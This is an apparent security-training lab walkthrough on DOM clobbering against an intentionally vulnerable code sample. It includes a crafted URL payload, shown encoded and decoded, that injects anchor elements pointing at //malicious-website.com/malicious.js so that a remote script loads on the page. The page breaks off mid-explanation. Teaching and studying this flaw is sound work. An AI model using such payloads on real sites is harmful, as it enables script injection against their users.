Dom-Clobbering

https://gitlab.com/jobertabma/vulnerable-code/-/tree/master/dom-clobbering?ref_type=heads

Step 1: Understand the Vulnerability

  • The vulnerability lies in the fact that the name parameter from the URL is directly output to the HTML without proper sanitization.

  • This allows an attacker to manipulate the DOM by injecting elements with specific IDs and attributes that the JavaScript code will later use.

Step 2: Create and Run the Bash Script

  1. Create the Bash Script: Create a file named run_dom.sh and add the provided Bash script to it.

Explanation of the Script:

  • echo $1 > _tmp/strip: This line is just an example of writing some input to a file, it doesn't affect the exploitation.

  • php -S 127.0.0.1:8080 -t dom-clobbering&: This starts a PHP built-in web server on 127.0.0.1:8080, serving files from the dom-clobbering directory.

  • This line uses the open command to open the specified URL in the default web browser.

  • The URL contains a specially crafted name parameter: %3Ca%20id=someObject%3E%3Ca%20id=someObject%20name=url%20href=//malicious-website.com/malicious.js%3E.

  • This URL-encoded string translates to: <a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>.

  • wait: This waits for the background processes to finish.

2.Make the Script Executable: Change the script's permissions to make it executable.

3.Run the script:

Expected Outcomes:

The expected outcome of exploiting the DOM clobbering vulnerability in the provided code is that a malicious script from //malicious-website.com/malicious.js will be loaded and executed in the context of the vulnerable web page. Here’s a detailed breakdown of what will happen:

  1. Malicious Script Injection:

    • The vulnerable web page receives the name parameter from the URL, which contains the crafted payload.

    • The HTML output will include the injected elements:

PreviousCross-Origin Resource Sharing (CORS)NextInsecure direct object references (IDOR)

Last updated